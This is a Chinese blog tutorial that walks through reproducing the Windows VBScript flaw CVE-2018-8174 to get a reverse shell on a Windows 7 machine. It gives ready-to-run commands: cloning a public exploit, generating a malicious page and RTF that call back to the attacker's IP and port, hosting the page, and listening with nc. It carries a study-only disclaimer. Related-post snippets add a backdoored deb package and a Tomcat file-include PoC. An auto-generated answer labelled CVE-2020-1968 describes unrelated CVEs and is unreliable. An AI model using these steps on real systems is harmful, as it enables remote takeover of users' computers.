CVE-2018-8174漏洞获取shell复现

最新推荐文章于 2022-06-24 18:24:16 发布
最新推荐文章于 2022-06-24 18:24:16 发布
阅读量1k 收藏 6
点赞数 3
分类专栏: 渗透测试 文章标签: 渗透测试 Kali Linux CVE-2018-8174 信息安全 windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40228200/article/details/125238255
版权

今天继续给大家介绍渗透测试相关知识,本文主要内容是CVE-2018-8174漏洞获取shell复现。

免责声明:
本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负!
再次强调:严禁对未授权设备进行渗透测试!

一、CVE-2018-8174漏洞简介

CVE-2018-8174漏洞是Windows VBScript Engine代码执行漏洞,该漏洞利用最新版本的IE浏览器内核的应用程序。利用该漏洞,用户在浏览网页或者是打开Office文档时都有可能被黑客所控制。微软官方在2018年4月20日早上确认该漏洞,并于2018年5月8号发布官方安全补丁,对该漏洞进行了修复,并将其命名为CVE-2018-8174。

二、利用漏洞生成网页

今天,我们就利用该漏洞,对目标Windows7的主机进行渗透测试。
首先,我们先下载该漏洞的利用工具,执行命令:

git clone https://github.com/Yt1g3r/CVE-2018-8174_EXP.git

即可将该漏洞的利用工具下载下来,该命令执行结果如下所示:
在这里插入图片描述
该命令执行后,我们会看到在当前目录下出现了一个名为CVE-2018-8174_EXP的目录,我们进入该目录,然后执行命令:

python CVE-2018-8174.py -u http://192.168.136.199/exploit.html -o exp.rtf -i 192.168.136.199 -p 4444

-u参数表示生成漏洞利用html文档,-o参数表示输出生成的文档,-i参数表示该漏洞的payload要访问的IP地址,-p参数为该漏洞payload的端口号,该目录执行结果如下所示:
在这里插入图片描述
之后,我们将生成的exploit.html复制到/var/www/html/目录中,并打开apache2服务。
之后,我们使用nc命令在4444端口上开启监听,执行命令:

nc -lvvp 4444

该命令执行结果如下所示:
在这里插入图片描述

三、效果检验

在完成上述操作后,我们在一台Windows7设备上,使用IE浏览器,访问该页面,结果如下所示:
在这里插入图片描述
此时,我们的nc命令上也收到了来自windows的反弹shell,我们可以在该shell上执行命令了。过程如下所示:
在这里插入图片描述
从上图可以知道,我们利用CVE-2018-8174漏洞,成功拿到了目标主机的shell。
原创不易,转载请说明出处:https://blog.csdn.net/weixin_40228200

永远是少年啊
关注
  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
利用 0DAY 漏洞 CVE-2018-8174 获取windows系统 shell
Cwillchris的博客
05-27 679
一、 利用 0DAY 漏洞 CVE-2018-8174 获取windows系统 shell 实验环境: kali攻击机(192.168.98.30) window目标机(192.168.98.35) CVE-2018-8174脚本 实验步骤: 1、xshell上传 CVE-2018-8174 的 EXP 到 Kali 2、解压 CVE-2018-8174 并进入该目录 3、利用EXP生成恶意html文件,并放到/var/www/html,为了让目标机访问 python2
CVE-2018-8174 IE浏览器远程代码执行漏洞
锋刃科技的博客
11-03 5962
0x00漏洞简介 在2018年5月9日的时候360发表了一份apt攻击分析及溯源报告 文中提到了cve-2018-8174这个漏洞的首次在apt方面的应用 原文地址:http://www.4hou.com/vulnerable/11441.html CVE2018-8174这个漏洞是针对ie浏览器的一个远程代码执行漏洞 CVE地址:http://cve.mitre.org/cgi-bin/...
CVE-2018-8174漏洞复现及内网渗透攻击
Waldocsdn的博客
03-12 2461
文章目录说明CVE-2018-8174漏洞简介Persistence后门环境搭建拓扑图Win server 2008 对Windows 7开启1433端口内网攻击过程1号机获得2号机的权限利用CVE-2018-8174漏洞获取2号机(Windows 7)权限,添加攻击者用户添加超级隐藏管理员账户使用vbs脚本上传SQLTOOLS.exe从Windows 7进攻Windows server 2008...
CVE-2018-8174漏洞两种姿势的复现
热门推荐
qq_39627497的博客
12-06 1万+
CVE-2018-8174漏洞两种姿势的复现 CVE-2018-8174漏洞两种姿势的复现 漏洞介绍: 该漏洞影响最新版本的IE浏览器及使用了IE内核的应用程序。用户在浏览网页或打开Office文档时都可能中招,最终被黑客植入后门木马完全控制电脑。微软在4月20日早上确认此漏洞,并于5月8号发布了官方安全补丁,对该0day漏洞进行了修复,并将其命名为CVE-2018-8174复现过程1: 1、...
CVE-2018-8174漏洞利用漏洞加固
凝聚力安全团队
10-24 1113
目录漏洞描述影响版本漏洞利用方法一方法二漏洞修复参考地址 漏洞描述   VBScript引擎处理内存中对象的方式中存在一个远程执行代码漏洞。该漏洞可能以一种攻击者可以在当前用户的上下文中执行任意代码的方式来破坏内存。成功利用漏洞的攻击者可以获得与当前用户相同的用户权限。如果当前用户使用管理用户权限登录,则成功利用漏洞的攻击者可以控制受影响的系统。然后,攻击者可能会安装程序。查看,更改或删除数据;或创建具有完全用户权限的新帐户。   在基于Web的攻击情形中,攻击者可能拥有一个旨在通过Internet E
CVE-2018-8174
weixin_43268670的博客
12-29 280
转载:https://blog.csdn.net/weixin_43894771/article/details/104781919 0day一把怎样的武器 0day漏洞,又称“零日漏洞”(zero-day),是已经被发现(有可能未被公开),而官方还没有相关补丁的漏洞。通俗地讲就是,除了漏洞发现者,没有其他的人知道这个漏洞的存在,并且可以有效地加以利用,发起的攻击往往具有很大的突发性与破坏性。 进入实战,学习0day更多的是学习一种思维模式 1、安装CVE-2018-8174_EXP 从githu.
CVE-2018-3191利用exp
01-08
打包的weblogic-CVE-2018-3191 exp配合ysoserial获取shell权限
CVE-2018-8174-msf:CVE-2018-8174-VBScript内存损坏漏洞利用
05-17
CVE-2018-8174-MSF 这是一个metasploit模块,该模块创建恶意的Word文档以利用CVE-2018-8174-VBScript内存损坏漏洞。 该模块是一个非常快速的端口,并使用在野外发现的漏洞利用示例。 该漏洞仅适用于32位Microsoft Office。 在本模块上有很多事情需要改进,但是如果有时间我会在将来进行更新。 安装 将CVE-2018-8174.rb复制到/ usr / share / metasploit-framework / modules / exploits / windows / fileformat / 将CVE-2018-8174.rtf复制到/ usr / share / metasploit-framework / data / exploits / 该漏洞无法与meterpreter shellcode一起很好地工作,因此
cve-2018-8174_analysis:VBS漏洞CVE-2018-8174的分析
05-02
剖析现代浏览器漏洞CVE-2018-8174的案例研究 概述 当这种漏洞利用在4月和5月初首次出现时,引起了我的极大兴趣,因为尽管进行了大量的混淆,但代码结构似乎井井有条,漏洞利用代码小得足以使分析变得更简单。 我下载了并决定将其作为深入研究的理想之选。 当时已经发表了两项分析,第一篇来自 ,第二篇来自。 他们俩都帮助我了解了它的工作原理,但还不足以深入了解漏洞利用的各个方面。 这就是为什么我决定自己进行分析并分享我的发现的原因。 前处理 首先,为了消除整数混淆,我在python脚本中使用了正则表达式替换: import re def process ( matchobj ): line = matchobj . group ( 1 ) line = line . lower (). replace ( '&h' , '0x' ) return str ( eval ( line
检测通过“ proxylogon”组漏洞CVE-2021-26855,CVE-2021-26857,CVE-2021-26858,CVE-2021-27065)利用的Microsoft Exchange服务器上掉落的Web Shell-.NET开发
05-27
检测0天威胁后在Microsoft Exchange服务器上丢弃的Webshel​​l此脚本查找0天威胁后在Microsoft Exchange服务器上丢弃的Webshel​​l此脚本查找Microsoft Exchange服务器上易受以下CVE攻击的Webshel​​l: -2021-...
利用deb包-0day-java环境-安卓客户端进行渗透
Q先生
07-20 1077
利用deb包-0day-java环境-安卓客户端进行渗透 1 制作恶意deb软件包来触发后门 制作恶意deb软件来触发后门一共分3步 下载软件包 解包 植入后门 1.1 下载软件包 apt install --download-only freesweep cp /var/cache/apt/archives/freesweep_1.0.1-1_amd64.deb ./ 1.2 解压包 dpkg -x freesweep_1.0.1-1_amd64.deb free cd free 1.
CVE-2018-8174漏洞复现
qq_45174221的博客
06-24 1251
CVE-2018-8174这个漏洞是针对IE浏览器的一个远程代码执行漏洞,是Windows VBScript Engine 代码执行漏洞,由于VBScript脚本执行引擎(vbscript.dll)存在代码执行漏洞,攻击者可以将恶意的VBScript嵌入到office文件或者网站中,一旦用户不小心点击,远程攻击者可以获取当前用户权限执行脚本中的恶意代码。 ............
php5.4.x缓冲区溢出,CVE-2018-7584
weixin_33181159的博客
03-11 730
PHP(PHP:Hypertext Preprocessor,PHP:超文本预处理器)是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发,支持多种数据库及操作系统。 PHP中的ext/standard/http_fopen_wrapper.c文件的‘php_stream_url_wrap_http_ex’函数存在栈缓冲区溢出漏洞。攻击者可利用漏洞...
CVE-2018-6794一把梭
Yale的博客
03-26 870
关于Suricata:Suricata是一种高性能网络威胁检测,IDS,IPS和网络安全监控引擎。 开源并由社区运营的非营利基金会开放信息安全基金会(OISF)所有。 Suricata由OISF,其支持供应商和社区开发. 漏洞描述: 4.0.4之前的Suricata在detect.c和stream-tcp.c中容易出现HTTP检测绕过漏洞。 如果恶意服务器在3次握手完成之前中断正常的TCP流并发送...
GoAhead 远程命令执行漏洞CVE-2017-17562)反弹shell
Aesthetic99的博客
03-22 6125
GoAhead 远程命令执行漏洞CVE-2017-17562)反弹shell GoAhead是一个开源(商业许可)、简单、轻巧、功能强大、可以在多个平台运行的Web Server,多用于嵌入式系统、智能设备。其支持运行ASP、Javascript和标准的CGI程序,这个漏洞就出现在运行CGI程序的时候。 GoAhead在接收到请求后,将会从URL参数中取出键和值注册进CGI程序的环境变量,且只过滤了REMOTE_HOST和HTTP_AUTHORIZATION。我们能够控制环境变量,就有很多攻击方式。比如在
IE浏览器 CVE-2018-8174漏洞复现
weixin_44664530的博客
04-23 396
漏洞介绍 CVE2018-8174这个漏洞是针对ie浏览器的一个远程代码执行漏洞 复现环境 kali win7 复现 克隆文件 git clone https://github.com/Sch01ar/CVE-2018-8174_EXP 生成 python CVE-2018-8174.py -u http://192.168.31.117/exploit.html -o exploit.rtf...
CVE-2020-1968复现方法
最新发布
07-28
复现CVE-2020-1968的方法如下: 1. 首先,克隆一个POC,可以使用以下命令克隆一个POC: ``` git clone https://github.com/sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read/ ``` \[1\] 2. 按照教程中的指导,在目标机器上执行以下命令以清除所有策略并添加SSH端口禁用策略: ``` iptables -F iptables -t filter -A INPUT -p tcp --dport 22 -m tos --tos 0x10 -j DROP iptables -L -n --line-number ``` \[2\] 3. 访问shell.txt文件,使其发生文件包含。可以使用以下命令: ``` python2 "Tomcat-ROOT路径下文件包含(CVE-2020-1938).py" -p 8009 -f /WEB-INF/shell.txt 192.168.47.129 ``` \[3\] 请注意,复现CVE-2020-1968存在一定的风险,应该在合法授权的环境中进行,并且仅用于研究和教育目的。 #### 引用[.reference_title] - *1* *3* [CVE-2020-1938 漏洞复现](https://blog.csdn.net/weixin_48799157/article/details/124889366)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [CVE-2020-15778 漏洞复现避坑指南](https://blog.csdn.net/weixin_45836195/article/details/125883140)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

永远是少年啊

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值